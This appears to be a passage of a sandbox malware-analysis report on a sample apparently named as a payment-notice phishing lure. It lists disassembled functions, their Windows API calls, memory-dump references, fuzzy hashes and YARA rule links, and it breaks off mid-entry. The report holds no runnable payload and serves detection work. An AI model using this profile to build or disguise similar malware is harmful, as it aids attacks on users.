Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen
String ID: HKEY_LOCAL_MACHINE$HKLM
API String ID: 176396367-4004644295
Opcode ID: cb4bb3eff2472ff836d2430976c3cfe7196111a6da04db666e76c7038d1d1e15
Instruction ID: ed1ddfbab9e946fcc460f9c81827921757d13cc9cc16e1d1098abe4a63c4dc58
Opcode Fuzzy Hash: cb4bb3eff2472ff836d2430976c3cfe7196111a6da04db666e76c7038d1d1e15
Instruction Fuzzy Hash: 9F3106F3A005694BCB30EFECC9411BE33999BA2790B454129FCD5AB345EA70CD80D3A1

Function 00972F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00972F8D
LoadLibraryW.KERNEL32(?), ref: 00972F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00972FA9
DestroyWindow.USER32(?), ref: 00972FB1

Strings

SysAnimate32, xrefs: 00972F68

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: f35e2821e378fb64ae3af0968a26ab7edec880d30248b9e411d35a1884cd6e7d
Instruction ID: 2d0124c833bce2d89b2855b5b6f8a39ba720617d2794c3338ad1ad3342213d3c
Opcode Fuzzy Hash: f35e2821e378fb64ae3af0968a26ab7edec880d30248b9e411d35a1884cd6e7d
Instruction Fuzzy Hash: 4D219D73224205ABEF104FA8DC80FBB77BDEB59368F108619F958D61A0E771DC91A760

Function 00904D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00904D1E,009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002), ref: 00904D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00904DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00904D1E,009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000), ref: 00904DC3

Strings

CorExitProcess, xrefs: 00904D98
mscoree.dll, xrefs: 00904D86

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c3ceabb61ff9010c04ecc7de6328c029822298c5aef8496c6e7f48482411b226
Instruction ID: ffffc7d5d35b6daca47e2f7ccd002f83d141fbb79a07c5b35e9585bbda0c1851
Opcode Fuzzy Hash: c3ceabb61ff9010c04ecc7de6328c029822298c5aef8496c6e7f48482411b226
Instruction Fuzzy Hash: DBF044B5654218BFDB115F90DC49B9DBBB9EF84755F440068F909A6290CB305980DBD1

Function 008E4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E4EAE
FreeLibrary.KERNEL32(00000000,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EC0

Strings

kernel32.dll, xrefs: 008E4E94
Wow64DisableWow64FsRedirection, xrefs: 008E4EA8

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: f87133e4e20f0d6e24875599087c6cc5c28e90ccec15a5d8060f75dd525dc2a5
Instruction ID: 3a7c49da479804d1eb22208e8526c92651fdff3d2d1f22b67394168339ef732f
Opcode Fuzzy Hash: f87133e4e20f0d6e24875599087c6cc5c28e90ccec15a5d8060f75dd525dc2a5
Instruction Fuzzy Hash: EFE08677A195636B93311B266C19A5F6654FFC2F72B054129FC0CD2100DB60CD4195A0

Function 008E4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4E74
FreeLibrary.KERNEL32(00000000,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E87

Strings

kernel32.dll, xrefs: 008E4E5B
Wow64RevertWow64FsRedirection, xrefs: 008E4E6E

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 4b9aea0984dafbc5688e3be74f6a1a55233ea88b19c55acdaf3761dac4326d5f
Instruction ID: fca82a301852679e8a2f8e8c6f684d839d8763daa54e53cec73b6b9b7c834c37
Opcode Fuzzy Hash: 4b9aea0984dafbc5688e3be74f6a1a55233ea88b19c55acdaf3761dac4326d5f
Instruction Fuzzy Hash: 09D0C27391A6625746221B266C08D8F6A18FF8AF253894128B80CE2110CF20CD41D5D0

Function 00952947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952C05
DeleteFileW.KERNEL32(?), ref: 00952C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00952C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952CC0

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 648a68bf6bcf4a2786e7d1b4202d85525ca4770d3e83a96107a10628c9f83d19
Instruction ID: 11fa29512b5a71827cbe75e0c81b81bdb8efc98ff3712735c2a8ec96b6bd473e
Opcode Fuzzy Hash: 648a68bf6bcf4a2786e7d1b4202d85525ca4770d3e83a96107a10628c9f83d19
Instruction Fuzzy Hash: D6B14E72D00119ABDF15DBA5CC85EDEB7BDEF4A354F1040A6FA09E6141EB309A488FA1

Function 0096A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0096A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0096A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0096A468
CloseHandle.KERNEL32(?), ref: 0096A63D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: c9d60ea8984b627871a9167d17a50900014d0d62999570dc9befa4d51e8fc026
Instruction ID: 2ae8deb4cec532c333b0b8b64543391b2095ea3f466bcbea7ef4e59dcdfef31d
Opcode Fuzzy Hash: c9d60ea8984b627871a9167d17a50900014d0d62999570dc9befa4d51e8fc026
Instruction Fuzzy Hash: 12A16C71604301AFD720DF29D886B2AB7E5EF84714F14885DF59ADB392DBB0EC418B92

Function 0094E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0094CF22,?), ref: 0094DDFD

Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0094CF22,?), ref: 0094DE16

Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A

lstrcmpiW.KERNEL32(?,?), ref: 0094E473
MoveFileW.KERNEL32(?,?), ref: 0094E4AC
_wcslen.LIBCMT ref: 0094E5EB
_wcslen.LIBCMT ref: 0094E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0094E650

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 045edd366cec23b142d70a28eb39cc507441b998fec5316bee880aa9170d6bcf
Instruction ID: e9473261fdd93ba8545e45f322a37ad79ed80da8d2733ac3c4d63a618d192773
Opcode Fuzzy Hash: 045edd366cec23b142d70a28eb39cc507441b998fec5316bee880aa9170d6bcf
Instruction Fuzzy Hash: 415142B25083859FC724EB94D881EDB73ECAFC5344F00492EF589D3191EF74A6888B66

Function 0096B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0096BB63
RegCloseKey.ADVAPI32(?,?), ref: 0096BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0096BBB3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 7adff5f2163f57552c6b16636c65c244c67ed0e105a8ba9beef1d3e3cb015be7
Instruction ID: 41ffa0ac3c58f5a31d5c35a934f2591b661aa18d6d438e29b8bfcbc774874026
Opcode Fuzzy Hash: 7adff5f2163f57552c6b16636c65c244c67ed0e105a8ba9beef1d3e3cb015be7
Instruction Fuzzy Hash: 6861A571208241EFD714DF64C490E2ABBE9FF85308F54895DF4998B2A2DB31ED85CB92

Function 00948BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00948BCD
VariantClear.OLEAUT32 ref: 00948C3E
VariantClear.OLEAUT32 ref: 00948C9D
VariantClear.OLEAUT32(?), ref: 00948D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00948D3B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 3cf852498a87d3268a28c43d461dc22e1316ffeb8ae49efcf3658e20dc8faabb
Instruction ID: ffd74cbd23f28520895da62d29f543abdc9f365aeadb25c0ba12d4846798491c
Opcode Fuzzy Hash: 3cf852498a87d3268a28c43d461dc22e1316ffeb8ae49efcf3658e20dc8faabb
Instruction Fuzzy Hash: 3B5166B5A11219EFCB14CF68C884EAAB7F9FF89314B158569E909DB350E730E911CF90

Function 00958AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00958BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00958BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00958C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00958C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00958C5F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 545f4e8990cd015289dd4596c9930eb513e0d26daeafa98448d16d74dda8ead0
Instruction ID: 66eb0723636257dc6f377df85f4e3a44e70e1f3f7b7e059845dac0e0a6d25ba7
Opcode Fuzzy Hash: 545f4e8990cd015289dd4596c9930eb513e0d26daeafa98448d16d74dda8ead0
Instruction Fuzzy Hash: 9D516A75A00618AFCB00DF69C881E6EBBF5FF49314F088458E949AB362DB31ED55CB91

Function 00968EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00968F40
GetProcAddress.KERNEL32(00000000,?), ref: 00968FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00968FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00969032
FreeLibrary.KERNEL32(00000000), ref: 00969052

Part of subcall function 008FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00951043,?,753CE610), ref: 008FF6E6
Part of subcall function 008FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0093FA64,00000000,00000000,?,?,00951043,?,753CE610,?,0093FA64), ref: 008FF70D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 9b530801b5d030da46b6d97ba8388706b7607cea4ced25ca85ea21701ed36ac7
Instruction ID: 83f33f62c28d1a3d5f42122b8d983ae3e3bb1acf995dca8aa8e669037729f2c8
Opcode Fuzzy Hash: 9b530801b5d030da46b6d97ba8388706b7607cea4ced25ca85ea21701ed36ac7
Instruction Fuzzy Hash: F6516C75604245DFCB11DF68C4848AEBBF5FF49314B0481A8E91AAB362DB31ED86CF91

Function 00976B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00976C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00976C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00976C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0095AB79,00000000,00000000), ref: 00976C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00976CC7

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 29518683dc28477fadfdf0618a55f108b876532efad19e263f6d533460b5ab88
Instruction ID: d8bd65c58a868f4993ae148e7125fd22bf702a0566507ddfe48353d7562d2d2c
Opcode Fuzzy Hash: 29518683dc28477fadfdf0618a55f108b876532efad19e263f6d533460b5ab88
Instruction Fuzzy Hash: 5D41E777604504AFD725CF38CD55FA57BA8EB49360F188268FADDA72E0C371AD40DA40

Function 00912051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009120C3
_free.LIBCMT ref: 009120E3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2b53926a9be1023dda11871d9db60cdd6bd1150319a7a5be4906875e124b4664
Instruction ID: c5a4f5dcaee2ca2689019592483eb93582e0049e335b730cbc4b0dfc32732bb6
Opcode Fuzzy Hash: 2b53926a9be1023dda11871d9db60cdd6bd1150319a7a5be4906875e124b4664
Instruction Fuzzy Hash: E141D472B00208AFCB24EF78C881A9DB7E5EF89314F1545A8E615EB352DB31AD51CB81

Function 008F912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 008F9141
ScreenToClient.USER32(00000000,?), ref: 008F915E
GetAsyncKeyState.USER32(00000001), ref: 008F9183
GetAsyncKeyState.USER32(00000002), ref: 008F919D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 04dc9d99c4b5fba8118a0285374e87ad2de83079df2cecd65a58c1f06078ff83
Instruction ID: 372609fdf46f986840249a3f9afecb65ccc7f93b222083d6bb3485594fac30f4
Opcode Fuzzy Hash: 04dc9d99c4b5fba8118a0285374e87ad2de83079df2cecd65a58c1f06078ff83
Instruction Fuzzy Hash: B8415F7290C60AFBDF159FA8C844BFEB775FB05324F208229E569A2290C7346990DF91

Function 00953874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 009538CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00953922
TranslateMessage.USER32(?), ref: 0095394B
DispatchMessageW.USER32(?), ref: 00953955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00953966

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: b10e136616e899a913842398df942c622b06d3912278e73b646912fe3047a2fc
Instruction ID: 45bb1d557467f7a6f4c7f71bd1c91995250b20be7c7d213e9c8602aed78f7a02
Opcode Fuzzy Hash: b10e136616e899a913842398df942c622b06d3912278e73b646912fe3047a2fc
Instruction Fuzzy Hash: F631E8B051C345DFEB39CB369968BB637ECEB01392F44855DE856C20A0E7B49688DB11

Function 0095CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0095CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFF2

Memory Dump Source

